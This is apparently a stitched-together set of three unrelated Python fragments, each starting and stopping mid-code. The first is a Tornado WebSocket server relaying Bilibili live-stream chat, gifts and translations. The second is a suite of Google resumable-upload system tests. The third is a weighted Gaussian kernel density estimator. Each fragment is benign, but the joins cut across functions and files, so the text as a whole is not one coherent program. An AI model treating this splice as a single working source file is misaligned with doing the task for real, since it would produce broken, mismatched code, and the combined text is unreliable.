except tornado.websocket.WebSocketClosedError:
room_manager.del_client(self.room_id, client)
def send_message_if(self, can_send_func: Callable[['ChatHandler'], bool], cmd, data):
body = json.dumps({'cmd': cmd, 'data': data})
for client in filter(can_send_func, self.clients):
try:
client.write_message(body)
except tornado.websocket.WebSocketClosedError:
room_manager.del_client(self.room_id, client)
async def _on_receive_danmaku(self, danmaku: blivedm.DanmakuMessage):
asyncio.ensure_future(self.__on_receive_danmaku(danmaku))
async def __on_receive_danmaku(self, danmaku: blivedm.DanmakuMessage):
if danmaku.uid == self.room_owner_uid:
author_type = 3 # 主播
elif danmaku.admin:
author_type = 2 # 房管
elif danmaku.privilege_type != 0: # 1总督,2提督,3舰长
author_type = 1 # 舰队
else:
author_type = 0
need_translate = self._need_translate(danmaku.msg)
if need_translate:
translation = models.translate.get_translation_from_cache(danmaku.msg)
if translation is None:
# 没有缓存,需要后面异步翻译后通知
translation = ''
else:
need_translate = False
else:
translation = ''
id_ = uuid.uuid4().hex
# 为了节省带宽用list而不是dict
self.send_message(Command.ADD_TEXT, make_text_message(
await models.avatar.get_avatar_url(danmaku.uid),
int(danmaku.timestamp / 1000),
danmaku.uname,
author_type,
danmaku.msg,
danmaku.privilege_type,
danmaku.msg_type,
danmaku.user_level,
danmaku.urank < 10000,
danmaku.mobile_verify,
0 if danmaku.room_id != self.room_id else danmaku.medal_level,
id_,
translation
))
if need_translate:
await self._translate_and_response(danmaku.msg, id_)
async def _on_receive_gift(self, gift: blivedm.GiftMessage):
avatar_url = models.avatar.process_avatar_url(gift.face)
models.avatar.update_avatar_cache(gift.uid, avatar_url)
if gift.coin_type != 'gold': # 丢人
return
id_ = uuid.uuid4().hex
self.send_message(Command.ADD_GIFT, {
'id': id_,
'avatarUrl': avatar_url,
'timestamp': gift.timestamp,
'authorName': gift.uname,
'totalCoin': gift.total_coin,
'giftName': gift.gift_name,
'num': gift.num
})
async def _on_buy_guard(self, message: blivedm.GuardBuyMessage):
asyncio.ensure_future(self.__on_buy_guard(message))
async def __on_buy_guard(self, message: blivedm.GuardBuyMessage):
id_ = uuid.uuid4().hex
self.send_message(Command.ADD_MEMBER, {
'id': id_,
'avatarUrl': await models.avatar.get_avatar_url(message.uid),
'timestamp': message.start_time,
'authorName': message.username,
'privilegeType': message.guard_level
})
async def _on_super_chat(self, message: blivedm.SuperChatMessage):
avatar_url = models.avatar.process_avatar_url(message.face)
models.avatar.update_avatar_cache(message.uid, avatar_url)
need_translate = self._need_translate(message.message)
if need_translate:
translation = models.translate.get_translation_from_cache(message.message)
if translation is None:
# 没有缓存,需要后面异步翻译后通知
translation = ''
else:
need_translate = False
else:
translation = ''
id_ = str(message.id)
self.send_message(Command.ADD_SUPER_CHAT, {
'id': id_,
'avatarUrl': avatar_url,
'timestamp': message.start_time,
'authorName': message.uname,
'price': message.price,
'content': message.message,
'translation': translation
})
if need_translate:
asyncio.ensure_future(self._translate_and_response(message.message, id_))
async def _on_super_chat_delete(self, message: blivedm.SuperChatDeleteMessage):
self.send_message(Command.ADD_SUPER_CHAT, {
'ids': list(map(str, message.ids))
})
def _need_translate(self, text):
cfg = config.get_config()
return (
cfg.enable_translate
and (not cfg.allow_translate_rooms or self.room_id in cfg.allow_translate_rooms)
and self.auto_translate_count > 0
and models.translate.need_translate(text)
)
async def _translate_and_response(self, text, msg_id):
translation = await models.translate.translate(text)
if translation is None:
return
self.send_message_if(
lambda client: client.auto_translate,
Command.UPDATE_TRANSLATION, make_translation_message(
msg_id,
translation
)
)
def make_text_message(avatar_url, timestamp, author_name, author_type, content, privilege_type,
is_gift_danmaku, author_level, is_newbie, is_mobile_verified, medal_level,
id_, translation):
return [
# 0: avatarUrl
avatar_url,
# 1: timestamp
timestamp,
# 2: authorName
author_name,
# 3: authorType
author_type,
# 4: content
content,
# 5: privilegeType
privilege_type,
# 6: isGiftDanmaku
1 if is_gift_danmaku else 0,
# 7: authorLevel
author_level,
# 8: isNewbie
1 if is_newbie else 0,
# 9: isMobileVerified
1 if is_mobile_verified else 0,
# 10: medalLevel
medal_level,
# 11: id
id_,
# 12: translation
translation
]
def make_translation_message(msg_id, translation):
return [
# 0: id
msg_id,
# 1: translation
translation
]
class RoomManager:
def __init__(self):
self._rooms: Dict[int, Room] = {}
async def get_room(self, room_id):
if room_id not in self._rooms:
if not await self._add_room(room_id):
return
room = self._rooms.get(room_id, None)
return room
async def add_client(self, room_id, client: 'ChatHandler'):
if room_id not in self._rooms:
if not await self._add_room(room_id):
client.close()
return
room = self._rooms.get(room_id, None)
if room is None:
return
room.clients.append(client)
logger.info('%d clients in room %s', len(room.clients), room_id)
if client.auto_translate:
room.auto_translate_count += 1
await client.on_join_room()
def del_client(self, room_id, client: 'ChatHandler'):
room = self._rooms.get(room_id, None)
if room is None:
return
try:
room.clients.remove(client)
except ValueError:
# _add_room未完成,没有执行到room.clients.append
pass
else:
logger.info('%d clients in room %s', len(room.clients), room_id)
if client.auto_translate:
room.auto_translate_count = max(0, room.auto_translate_count - 1)
if not room.clients:
self._del_room(room_id)
async def _add_room(self, room_id):
if room_id in self._rooms:
return True
logger.info('Creating room %d', room_id)
self._rooms[room_id] = room = Room(room_id)
if await room.init_room():
# start new log file
room.start()
logger.info('%d rooms', len(self._rooms))
return True
else:
self._del_room(room_id)
return False
def _del_room(self, room_id):
room = self._rooms.get(room_id, None)
if room is None:
return
logger.info('Removing room %d', room_id)
for client in room.clients:
client.close()
room.stop_and_close()
self._rooms.pop(room_id, None)
logger.info('%d rooms', len(self._rooms))
# noinspection PyAbstractClass
class ChatHandler(tornado.websocket.WebSocketHandler):
HEARTBEAT_INTERVAL = 10
RECEIVE_TIMEOUT = HEARTBEAT_INTERVAL + 5
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._heartbeat_timer_handle = None
self._receive_timeout_timer_handle = None
self.room_id = None
self.auto_translate = False
def open(self):
logger.info('Websocket connected %s', self.request.remote_ip)
self._heartbeat_timer_handle = asyncio.get_event_loop().call_later(
self.HEARTBEAT_INTERVAL, self._on_send_heartbeat
)
self._refresh_receive_timeout_timer()
def _on_send_heartbeat(self):
self.send_message(Command.HEARTBEAT, {})
self._heartbeat_timer_handle = asyncio.get_event_loop().call_later(
self.HEARTBEAT_INTERVAL, self._on_send_heartbeat
)
def _refresh_receive_timeout_timer(self):
if self._receive_timeout_timer_handle is not None:
self._receive_timeout_timer_handle.cancel()
self._receive_timeout_timer_handle = asyncio.get_event_loop().call_later(
self.RECEIVE_TIMEOUT, self._on_receive_timeout
)
def _on_receive_timeout(self):
logger.warning('Client %s timed out', self.request.remote_ip)
self._receive_timeout_timer_handle = None
self.close()
def on_close(self):
logger.info('Websocket disconnected %s room: %s', self.request.remote_ip, str(self.room_id))
if self.has_joined_room:
room_manager.del_client(self.room_id, self)
if self._heartbeat_timer_handle is not None:
self._heartbeat_timer_handle.cancel()
self._heartbeat_timer_handle = None
if self._receive_timeout_timer_handle is not None:
self._receive_timeout_timer_handle.cancel()
self._receive_timeout_timer_handle = None
def on_message(self, message):
try:
# 超时没有加入房间也断开
if self.has_joined_room:
self._refresh_receive_timeout_timer()
body = json.loads(message)
cmd = body['cmd']
if cmd == Command.HEARTBEAT:
pass
elif cmd == Command.JOIN_ROOM:
if self.has_joined_room:
return
self._refresh_receive_timeout_timer()
self.room_id = int(body['data']['roomId'])
logger.info('Client %s is joining room %d', self.request.remote_ip, self.room_id)
try:
cfg = body['data']['config']
self.auto_translate = cfg['autoTranslate']
except KeyError:
pass
asyncio.ensure_future(room_manager.add_client(self.room_id, self))
else:
logger.warning('Unknown cmd, client: %s, cmd: %d, body: %s', self.request.remote_ip, cmd, body)
except Exception:
logger.exception('on_message error, client: %s, message: %s', self.request.remote_ip, message)
# 跨域测试用
def check_origin(self, origin):
if self.application.settings['debug']:
return True
return super().check_origin(origin)
@property
def has_joined_room(self):
return self.room_id is not None
def send_message(self, cmd, data):
body = json.dumps({'cmd': cmd, 'data': data})
try:
self.write_message(body)
except tornado.websocket.WebSocketClosedError:
self.close()
async def on_join_room(self):
if self.application.settings['debug']:
await self.send_test_message()
# 不允许自动翻译的提示
if self.auto_translate:
cfg = config.get_config()
if cfg.allow_translate_rooms and self.room_id not in cfg.allow_translate_rooms:
self.send_message(Command.ADD_TEXT, make_text_message(
models.avatar.DEFAULT_AVATAR_URL,
int(time.time()),
'blivechat',
2,
'Translation is not allowed in this room. Please download to use translation',
0,
False,
60,
False,
True,
0,
uuid.uuid4().hex,
''
))
# 测试用
async def send_test_message(self):
base_data = {
'avatarUrl': await models.avatar.get_avatar_url(300474),
'timestamp': int(time.time()),
'authorName': 'xfgryujk',
}
text_data = make_text_message(
base_data['avatarUrl'],
base_data['timestamp'],
base_data['authorName'],
0,
'我能吞下玻璃而不伤身体',
0,
False,
20,
False,
True,
0,
uuid.uuid4().hex,
''
)
member_data = {
**base_data,
'id': uuid.uuid4().hex,
'privilegeType': 3
}
gift_data = {
**base_data,
'id': uuid.uuid4().hex,
'totalCoin': 450000,
'giftName': '摩天大楼',
'num': 1
}
sc_data = {
**base_data,
'id': str(random.randint(1, 65535)),
'price': 30,
'content': 'The quick brown fox jumps over the lazy dog',
'translation': ''
}
self.send_message(Command.ADD_TEXT, text_data)
text_data[2] = '主播'
text_data[3] = 3
text_data[4] = "I can eat glass, it doesn't hurt me."
text_data[11] = uuid.uuid4().hex
self.send_message(Command.ADD_TEXT, text_data)
self.send_message(Command.ADD_MEMBER, member_data)
self.send_message(Command.ADD_SUPER_CHAT, sc_data)
sc_data['id'] = str(random.randint(1, 65535))
sc_data['price'] = 100
sc_data['content'] = '敏捷的棕色狐狸跳过了懒狗'
self.send_message(Command.ADD_SUPER_CHAT, sc_data)
# self.send_message(Command.DEL_SUPER_CHAT, {'ids': [sc_data['id']]})
self.send_message(Command.ADD_GIFT, gift_data)
gift_data['id'] = uuid.uuid4().hex
gift_data['totalCoin'] = 1245000
gift_data['giftName'] = '小电视飞船'
self.send_message(Command.ADD_GIFT, gift_data)
# noinspection PyAbstractClass
class RoomInfoHandler(api.base.ApiHandler):
_host_server_list_cache = blivedm.DEFAULT_DANMAKU_SERVER_LIST
async def get(self):
room_id = int(self.get_query_argument('roomId'))
logger.info('Client %s is getting room info %d', self.request.remote_ip, room_id)
room_id, owner_uid = await self._get_room_info(room_id)
host_server_list = await self._get_server_host_list(room_id)
if owner_uid == 0:
# 缓存3分钟
self.set_header('Cache-Control', 'private, max-age=180')
else:
# 缓存1天
self.set_header('Cache-Control', 'private, max-age=86400')
self.write({
'roomId': room_id,
'ownerUid': owner_uid,
| |
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import hashlib
import io
import os
import pytest
import mock
from six.moves import http_client
from six.moves import urllib_parse
from google.resumable_media import common
from google import resumable_media
import google.resumable_media.requests as resumable_requests
from google.resumable_media import _helpers
from tests.system import utils
from google.resumable_media import _upload
CURR_DIR = os.path.dirname(os.path.realpath(__file__))
DATA_DIR = os.path.join(CURR_DIR, u"..", u"..", u"data")
ICO_FILE = os.path.realpath(os.path.join(DATA_DIR, u"favicon.ico"))
IMAGE_FILE = os.path.realpath(os.path.join(DATA_DIR, u"image1.jpg"))
ICO_CONTENT_TYPE = u"image/x-icon"
JPEG_CONTENT_TYPE = u"image/jpeg"
BYTES_CONTENT_TYPE = u"application/octet-stream"
BAD_CHUNK_SIZE_MSG = (
b"Invalid request. The number of bytes uploaded is required to be equal "
b"or greater than 262144, except for the final request (it's recommended "
b"to be the exact multiple of 262144). The received request contained "
b"1024 bytes, which does not meet this requirement."
)
@pytest.fixture
def cleanup():
to_delete = []
def add_cleanup(blob_name, transport):
to_delete.append((blob_name, transport))
yield add_cleanup
for blob_name, transport in to_delete:
metadata_url = utils.METADATA_URL_TEMPLATE.format(blob_name=blob_name)
response = utils.retry_transient_errors(transport.delete)(metadata_url)
assert response.status_code == http_client.NO_CONTENT
@pytest.fixture
def img_stream():
"""Open-file as a fixture.
This is so that an entire test can execute in the context of
the context manager without worrying about closing the file.
"""
with open(IMAGE_FILE, u"rb") as file_obj:
yield file_obj
def get_md5(data):
hash_obj = hashlib.md5(data)
return base64.b64encode(hash_obj.digest())
def get_upload_id(upload_url):
parse_result = urllib_parse.urlparse(upload_url)
parsed_query = urllib_parse.parse_qs(parse_result.query)
# NOTE: We are unpacking here, so asserting exactly one match.
(upload_id,) = parsed_query[u"upload_id"]
return upload_id
def get_num_chunks(total_bytes, chunk_size):
expected_chunks, remainder = divmod(total_bytes, chunk_size)
if remainder > 0:
expected_chunks += 1
return expected_chunks
def check_response(
response,
blob_name,
actual_contents=None,
total_bytes=None,
metadata=None,
content_type=ICO_CONTENT_TYPE,
):
assert response.status_code == http_client.OK
json_response = response.json()
assert json_response[u"bucket"] == utils.BUCKET_NAME
assert json_response[u"contentType"] == content_type
if actual_contents is not None:
md5_hash = json_response[u"md5Hash"].encode(u"ascii")
assert md5_hash == get_md5(actual_contents)
total_bytes = len(actual_contents)
assert json_response[u"metageneration"] == u"1"
assert json_response[u"name"] == blob_name
assert json_response[u"size"] == u"{:d}".format(total_bytes)
assert json_response[u"storageClass"] == u"STANDARD"
if metadata is None:
assert u"metadata" not in json_response
else:
assert json_response[u"metadata"] == metadata
def check_content(blob_name, expected_content, transport, headers=None):
media_url = utils.DOWNLOAD_URL_TEMPLATE.format(blob_name=blob_name)
download = resumable_requests.Download(media_url, headers=headers)
response = download.consume(transport)
assert response.status_code == http_client.OK
assert response.content == expected_content
def check_tombstoned(upload, transport, *args):
assert upload.finished
basic_types = (resumable_requests.SimpleUpload, resumable_requests.MultipartUpload)
if isinstance(upload, basic_types):
with pytest.raises(ValueError):
upload.transmit(transport, *args)
else:
with pytest.raises(ValueError):
upload.transmit_next_chunk(transport, *args)
def check_does_not_exist(transport, blob_name):
metadata_url = utils.METADATA_URL_TEMPLATE.format(blob_name=blob_name)
# Make sure we are creating a **new** object.
response = transport.get(metadata_url)
assert response.status_code == http_client.NOT_FOUND
def check_initiate(response, upload, stream, transport, metadata):
assert response.status_code == http_client.OK
assert response.content == b""
upload_id = get_upload_id(upload.resumable_url)
assert response.headers[u"x-guploader-uploadid"] == upload_id
assert stream.tell() == 0
# Make sure the upload cannot be re-initiated.
with pytest.raises(ValueError) as exc_info:
upload.initiate(transport, stream, metadata, JPEG_CONTENT_TYPE)
exc_info.match(u"This upload has already been initiated.")
def check_bad_chunk(upload, transport):
with pytest.raises(resumable_media.InvalidResponse) as exc_info:
upload.transmit_next_chunk(transport)
error = exc_info.value
response = error.response
assert response.status_code == http_client.BAD_REQUEST
assert response.content == BAD_CHUNK_SIZE_MSG
def transmit_chunks(
upload, transport, blob_name, metadata, num_chunks=0, content_type=JPEG_CONTENT_TYPE
):
while not upload.finished:
num_chunks += 1
response = upload.transmit_next_chunk(transport)
if upload.finished:
assert upload.bytes_uploaded == upload.total_bytes
check_response(
response,
blob_name,
total_bytes=upload.total_bytes,
metadata=metadata,
content_type=content_type,
)
else:
assert upload.bytes_uploaded == num_chunks * upload.chunk_size
assert response.status_code == resumable_media.PERMANENT_REDIRECT
return num_chunks
def test_simple_upload(authorized_transport, bucket, cleanup):
with open(ICO_FILE, u"rb") as file_obj:
actual_contents = file_obj.read()
blob_name = os.path.basename(ICO_FILE)
# Make sure to clean up the uploaded blob when we are done.
cleanup(blob_name, authorized_transport)
check_does_not_exist(authorized_transport, blob_name)
# Create the actual upload object.
upload_url = utils.SIMPLE_UPLOAD_TEMPLATE.format(blob_name=blob_name)
upload = resumable_requests.SimpleUpload(upload_url)
# Transmit the resource.
response = upload.transmit(authorized_transport, actual_contents, ICO_CONTENT_TYPE)
check_response(response, blob_name, actual_contents=actual_contents)
# Download the content to make sure it's "working as expected".
check_content(blob_name, actual_contents, authorized_transport)
# Make sure the upload is tombstoned.
check_tombstoned(upload, authorized_transport, actual_contents, ICO_CONTENT_TYPE)
def test_simple_upload_with_headers(authorized_transport, bucket, cleanup):
blob_name = u"some-stuff.bin"
# Make sure to clean up the uploaded blob when we are done.
cleanup(blob_name, authorized_transport)
check_does_not_exist(authorized_transport, blob_name)
# Create the actual upload object.
upload_url = utils.SIMPLE_UPLOAD_TEMPLATE.format(blob_name=blob_name)
headers = utils.get_encryption_headers()
upload = resumable_requests.SimpleUpload(upload_url, headers=headers)
# Transmit the resource.
data = b"Binary contents\x00\x01\x02."
response = upload.transmit(authorized_transport, data, BYTES_CONTENT_TYPE)
check_response(
response, blob_name, actual_contents=data, content_type=BYTES_CONTENT_TYPE
)
# Download the content to make sure it's "working as expected".
check_content(blob_name, data, authorized_transport, headers=headers)
# Make sure the upload is tombstoned.
check_tombstoned(upload, authorized_transport, data, BYTES_CONTENT_TYPE)
@pytest.mark.parametrize("checksum", ["md5", "crc32c", None])
def test_multipart_upload(authorized_transport, bucket, cleanup, checksum):
with open(ICO_FILE, u"rb") as file_obj:
actual_contents = file_obj.read()
blob_name = os.path.basename(ICO_FILE)
# Make sure to clean up the uploaded blob when we are done.
cleanup(blob_name, authorized_transport)
check_does_not_exist(authorized_transport, blob_name)
# Create the actual upload object.
upload_url = utils.MULTIPART_UPLOAD
upload = resumable_requests.MultipartUpload(upload_url, checksum=checksum)
# Transmit the resource.
metadata = {u"name": blob_name, u"metadata": {u"color": u"yellow"}}
response = upload.transmit(
authorized_transport, actual_contents, metadata, ICO_CONTENT_TYPE
)
check_response(
response,
blob_name,
actual_contents=actual_contents,
metadata=metadata[u"metadata"],
)
# Download the content to make sure it's "working as expected".
check_content(blob_name, actual_contents, authorized_transport)
# Make sure the upload is tombstoned.
check_tombstoned(
upload, authorized_transport, actual_contents, metadata, ICO_CONTENT_TYPE
)
@pytest.mark.parametrize("checksum", [u"md5", u"crc32c"])
def test_multipart_upload_with_bad_checksum(authorized_transport, checksum, bucket):
with open(ICO_FILE, u"rb") as file_obj:
actual_contents = file_obj.read()
blob_name = os.path.basename(ICO_FILE)
check_does_not_exist(authorized_transport, blob_name)
# Create the actual upload object.
upload_url = utils.MULTIPART_UPLOAD
upload = resumable_requests.MultipartUpload(upload_url, checksum=checksum)
# Transmit the resource.
metadata = {u"name": blob_name, u"metadata": {u"color": u"yellow"}}
fake_checksum_object = _helpers._get_checksum_object(checksum)
fake_checksum_object.update(b"bad data")
fake_prepared_checksum_digest = _helpers.prepare_checksum_digest(
fake_checksum_object.digest()
)
with mock.patch.object(
_helpers, "prepare_checksum_digest", return_value=fake_prepared_checksum_digest
):
with pytest.raises(common.InvalidResponse) as exc_info:
response = upload.transmit(
authorized_transport, actual_contents, metadata, ICO_CONTENT_TYPE
)
response = exc_info.value.response
message = response.json()["error"]["message"]
# Attempt to verify that this is a checksum mismatch error.
assert checksum.upper() in message
assert fake_prepared_checksum_digest in message
# Make sure the upload is tombstoned.
check_tombstoned(
upload, authorized_transport, actual_contents, metadata, ICO_CONTENT_TYPE
)
def test_multipart_upload_with_headers(authorized_transport, bucket, cleanup):
blob_name = u"some-multipart-stuff.bin"
# Make sure to clean up the uploaded blob when we are done.
cleanup(blob_name, authorized_transport)
check_does_not_exist(authorized_transport, blob_name)
# Create the actual upload object.
upload_url = utils.MULTIPART_UPLOAD
headers = utils.get_encryption_headers()
upload = resumable_requests.MultipartUpload(upload_url, headers=headers)
# Transmit the resource.
metadata = {u"name": blob_name}
data = b"Other binary contents\x03\x04\x05."
response = upload.transmit(authorized_transport, data, metadata, BYTES_CONTENT_TYPE)
check_response(
response, blob_name, actual_contents=data, content_type=BYTES_CONTENT_TYPE
)
# Download the content to make sure it's "working as expected".
check_content(blob_name, data, authorized_transport, headers=headers)
# Make sure the upload is tombstoned.
check_tombstoned(upload, authorized_transport, data, metadata, BYTES_CONTENT_TYPE)
def _resumable_upload_helper(
authorized_transport, stream, cleanup, headers=None, checksum=None
):
blob_name = os.path.basename(stream.name)
# Make sure to clean up the uploaded blob when we are done.
cleanup(blob_name, authorized_transport)
check_does_not_exist(authorized_transport, blob_name)
# Create the actual upload object.
chunk_size = resumable_media.UPLOAD_CHUNK_SIZE
upload = resumable_requests.ResumableUpload(
utils.RESUMABLE_UPLOAD, chunk_size, headers=headers, checksum=checksum
)
# Initiate the upload.
metadata = {u"name": blob_name, u"metadata": {u"direction": u"north"}}
response = upload.initiate(
authorized_transport, stream, metadata, JPEG_CONTENT_TYPE
)
# Make sure ``initiate`` succeeded and did not mangle the stream.
check_initiate(response, upload, stream, authorized_transport, metadata)
# Actually upload the file in chunks.
num_chunks = transmit_chunks(
upload, authorized_transport, blob_name, metadata[u"metadata"]
)
assert num_chunks == get_num_chunks(upload.total_bytes, chunk_size)
# Download the content to make sure it's "working as expected".
stream.seek(0)
actual_contents = stream.read()
check_content(blob_name, actual_contents, authorized_transport, headers=headers)
# Make sure the upload is tombstoned.
check_tombstoned(upload, authorized_transport)
@pytest.mark.parametrize("checksum", [u"md5", u"crc32c", None])
def test_resumable_upload(authorized_transport, img_stream, bucket, cleanup, checksum):
_resumable_upload_helper(
authorized_transport, img_stream, cleanup, checksum=checksum
)
def test_resumable_upload_with_headers(
authorized_transport, img_stream, bucket, cleanup
):
headers = utils.get_encryption_headers()
_resumable_upload_helper(authorized_transport, img_stream, cleanup, headers=headers)
@pytest.mark.parametrize("checksum", [u"md5", u"crc32c"])
def test_resumable_upload_with_bad_checksum(
authorized_transport, img_stream, bucket, cleanup, checksum
):
fake_checksum_object = _helpers._get_checksum_object(checksum)
fake_checksum_object.update(b"bad data")
fake_prepared_checksum_digest = _helpers.prepare_checksum_digest(
fake_checksum_object.digest()
)
with mock.patch.object(
_helpers, "prepare_checksum_digest", return_value=fake_prepared_checksum_digest
):
with pytest.raises(common.DataCorruption) as exc_info:
_resumable_upload_helper(
authorized_transport, img_stream, cleanup, checksum=checksum
)
expected_checksums = {"md5": "1bsd83IYNug8hd+V1ING3Q==", "crc32c": "YQGPxA=="}
expected_message = _upload._UPLOAD_CHECKSUM_MISMATCH_MESSAGE.format(
checksum.upper(), fake_prepared_checksum_digest, expected_checksums[checksum]
)
assert exc_info.value.args[0] == expected_message
def test_resumable_upload_bad_chunk_size(authorized_transport, img_stream):
blob_name = os.path.basename(img_stream.name)
# Create the actual upload object.
upload = resumable_requests.ResumableUpload(
utils.RESUMABLE_UPLOAD, resumable_media.UPLOAD_CHUNK_SIZE
)
# Modify the ``upload`` **after** construction so we can
# use a bad chunk size.
upload._chunk_size = 1024
assert upload._chunk_size < resumable_media.UPLOAD_CHUNK_SIZE
# Initiate the upload.
metadata = {u"name": blob_name}
response = upload.initiate(
authorized_transport, img_stream, metadata, JPEG_CONTENT_TYPE
)
# Make sure ``initiate`` succeeded and did not mangle the stream.
check_initiate(response, upload, img_stream, authorized_transport, metadata)
# Make the first request and verify that it fails.
check_bad_chunk(upload, authorized_transport)
# Reset the chunk | |
evaluate the weighted sum
estimate = np.zeros((m, p), dtype)
for i in range(n):
for j in range(m):
arg = 0
for k in range(d):
residual = (points_[i, k] - xi_[j, k])
arg += residual * residual
arg = np.exp(-arg / 2) * norm
for k in range(p):
estimate[j, k] += values_[i, k] * arg
return np.asarray(estimate)
@dataclass(frozen=True)
class GaussianKDEInformation:
points: np.ndarray # (d, n) shaped array of datapoints
weights: np.ndarray # (d, n) shaped array of weights, optional
dimension: int # data dimension
n: int # number of data points
neff: float # effective sample size
CovarianceFactorFunctionType = tp.Callable[[GaussianKDEInformation], float]
SCOTTS_FACTOR_STRING = 'scotts'
SILVERMAN_FACTOR_STRING = 'silverman'
def compute_scotts_factor(kde_info: GaussianKDEInformation) -> float:
return power(kde_info.neff, -1.0 / (kde_info.dimension + 4))
def compute_silverman_factor(kde_info: GaussianKDEInformation) -> float:
d = kde_info.dimension
neff = kde_info.neff
return power(neff * (d + 2.0) / 4.0, -1.0 / (d + 4))
# class CovarianceFactor(ABC):
# @abstractmethod
# def compute_covariance_factor(self, kde_info: GaussianKDEInformation) -> float:
# pass
#
#
# class ScottsFactor(CovarianceFactor):
# def compute_covariance_factor(self, kde_info: GaussianKDEInformation) -> float:
# return power(kde_info.neff, -1.0 / (kde_info.dimension + 4))
#
#
# class SilvermanFactor(CovarianceFactor):
# def compute_covariance_factor(self, kde_info: GaussianKDEInformation) -> float:
# d = kde_info.dimension
# neff = kde_info.neff
# return power(neff * (d + 2.0) / 4.0, -1.0 / (d + 4))
#
#
# class LambdaCovarianceFactor(CovarianceFactor):
# def __init__(self, covariance_factor_fun: tp.Callable[[GaussianKDEInformation], float]):
# self._covariance_factor_fun = covariance_factor_fun
#
# def compute_covariance_factor(self, kde_info: GaussianKDEInformation) -> float:
# return self._covariance_factor_fun(kde_info)
class gaussian_kde:
"""Representation of a kernel-density estimate using Gaussian kernels.
Kernel density estimation is a way to estimate the probability density
function (PDF) of a random variable in a non-parametric way.
`gaussian_kde` works for both uni-variate and multi-variate data. It
includes automatic bandwidth determination. The estimation works best for
a unimodal distribution; bimodal or multi-modal distributions tend to be
oversmoothed.
Parameters
----------
dataset : array_like
Datapoints to estimate from. In case of univariate data this is a 1-D
array, otherwise a 2-D array with shape (# of dims, # of data).
bw_method : str, scalar or callable, optional
The method used to calculate the estimator bandwidth. This can be
'scott', 'silverman', a scalar constant or a callable. If a scalar,
this will be used directly as `kde.factor`. If a callable, it should
take a `gaussian_kde` instance as only parameter and return a scalar.
If None (default), 'scott' is used. See Notes for more details.
weights : array_like, optional
weights of datapoints. This must be the same shape as dataset.
If None (default), the samples are assumed to be equally weighted
gpu: whether to evaluate the kernel density estimate on the gpu
Attributes
----------
dataset : ndarray
The dataset with which `gaussian_kde` was initialized.
d : int
Number of dimensions.
n : int
Number of datapoints.
neff : int
Effective number of datapoints.
.. versionadded:: 1.2.0
factor : float
The bandwidth factor, obtained from `kde.covariance_factor`, with which
the covariance matrix is multiplied.
covariance : ndarray
The covariance matrix of `dataset`, scaled by the calculated bandwidth
(`kde.factor`).
inv_cov : ndarray
The inverse of `covariance`.
Methods
-------
evaluate
__call__
integrate_gaussian
integrate_box_1d
integrate_box
integrate_kde
pdf
logpdf
resample
Notes
-----
Bandwidth selection strongly influences the estimate obtained from the KDE
(much more so than the actual shape of the kernel). Bandwidth selection
can be done by a "rule of thumb", by cross-validation, by "plug-in
methods" or by other means; see [3]_, [4]_ for reviews. `gaussian_kde`
uses a rule of thumb, the default is Scott's Rule.
Scott's Rule [1]_, implemented as `scotts_factor`, is::
n**(-1./(d+4)),
with ``n`` the number of data points and ``d`` the number of dimensions.
In the case of unequally weighted points, `scotts_factor` becomes::
neff**(-1./(d+4)),
with ``neff`` the effective number of datapoints.
Silverman's Rule [2]_, implemented as `silverman_factor`, is::
(n * (d + 2) / 4.)**(-1. / (d + 4)).
or in the case of unequally weighted points::
(neff * (d + 2) / 4.)**(-1. / (d + 4)).
Good general descriptions of kernel density estimation can be found in [1]_
and [2]_, the mathematics for this multi-dimensional implementation can be
found in [1]_.
With a set of weighted samples, the effective number of datapoints ``neff``
is defined by::
neff = sum(weights)^2 / sum(weights^2)
as detailed in [5]_.
References
----------
.. [1] <NAME>, "Multivariate Density Estimation: Theory, Practice, and
Visualization", John Wiley & Sons, New York, Chicester, 1992.
.. [2] <NAME>, "Density Estimation for Statistics and Data
Analysis", Vol. 26, Monographs on Statistics and Applied Probability,
Chapman and Hall, London, 1986.
.. [3] <NAME>, "Bandwidth Selection in Kernel Density Estimation: A
Review", CORE and Institut de Statistique, Vol. 19, pp. 1-33, 1993.
.. [4] <NAME> and <NAME>, "Bandwidth selection for kernel
conditional density estimation", Computational Statistics & Data
Analysis, Vol. 36, pp. 279-298, 2001.
.. [5] <NAME>., 1969, Journal of the Royal Statistical Society.
Series A (General), 132, 272
Examples
--------
Generate some random two-dimensional data:
>>> from scipy import stats
>>> def measure(n):
... "Measurement model, return two coupled measurements."
... m1 = np.random.normal(size=n)
... m2 = np.random.normal(scale=0.5, size=n)
... return m1+m2, m1-m2
>>> m1, m2 = measure(2000)
>>> xmin = m1.min()
>>> xmax = m1.max()
>>> ymin = m2.min()
>>> ymax = m2.max()
Perform a kernel density estimate on the data:
>>> X, Y = np.mgrid[xmin:xmax:100j, ymin:ymax:100j]
>>> positions = np.vstack([X.ravel(), Y.ravel()])
>>> values = np.vstack([m1, m2])
>>> kernel = stats.gaussian_kde(values)
>>> Z = np.reshape(kernel(positions).T, X.shape)
Plot the results:
>>> import matplotlib.pyplot as plt
>>> fig, ax = plt.subplots()
>>> ax.imshow(np.rot90(Z), cmap=plt.cm.gist_earth_r,
... extent=[xmin, xmax, ymin, ymax])
>>> ax.plot(m1, m2, 'k.', markersize=2)
>>> ax.set_xlim([xmin, xmax])
>>> ax.set_ylim([ymin, ymax])
>>> plt.show()
"""
def __init__(self,
dataset: NumericArray,
bw_method: tp.Optional[tp.Union[CovarianceFactorFunctionType,
str,
tp.Callable,
numbers.Number]] = None,
weights: tp.Optional[NumericArray] = None,
gpu: bool = False):
self._num_pack = select_num_pack(gpu)
self._gpu = gpu
self.dataset = atleast_2d(asarray(dataset))
if not self.dataset.size > 1:
raise ValueError("`dataset` input should have multiple elements.")
self.d, self.n = self.dataset.shape
if weights is not None:
weights = atleast_1d(weights).astype(float)
weights /= np.sum(weights)
if weights.ndim != 1:
raise ValueError("`weights` input should be one-dimensional.")
if len(weights) != self.n:
raise ValueError("`weights` input should be of length n")
self._neff = 1.0/np.sum(weights**2)
else:
weights = ones(self.n) / self.n
if gpu:
dtype = np.float32
